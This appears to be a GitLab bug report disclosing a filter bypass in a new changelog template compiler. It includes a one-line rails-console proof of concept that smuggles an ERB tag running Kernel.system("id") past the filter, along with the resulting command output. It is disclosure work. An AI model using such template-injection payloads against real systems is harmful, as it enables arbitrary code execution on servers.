Bypass filter in new changelog generation feature and achieve code execution
Summary
We are working on a new feature to generate changelogs and I missed something in my initial review. Thanks to @joernchen for spotting this,
Steps to reproduce
From the rails console
[4] pry(main)> Gitlab::Changelog::Template::Compiler.new.compile("x<\\\n%::Kernel.system(\"id\")%>").render(binding)
uid=501(dcouture) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)
=> "x"
Example Project
What is the current bug behavior?
Possibly to bypass the filter and run arbitrary ERB
What is the expected correct behavior?
Filter should catch that
Relevant logs and/or screenshots
Output of checks
This bug happens on GitLab.com, however in code that isn't called by anything yet as far as I know.
Results of GitLab environment info
Expand for output related to GitLab environment info
(For installations with omnibus-gitlab package run and paste the output of: `sudo gitlab-rake gitlab:env:info`) (For installations from source run and paste the output of: `sudo -u git -H bundle exec rake gitlab:env:info RAILS_ENV=production`)
Results of GitLab application Check
Expand for output related to the GitLab application check
(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:check SANITIZE=true
)(For installations from source run and paste the output of:
sudo -u git -H bundle exec rake gitlab:check RAILS_ENV=production SANITIZE=true
)(we will only investigate if the tests are passing)
Possible fixes
Edited by Dominic Couture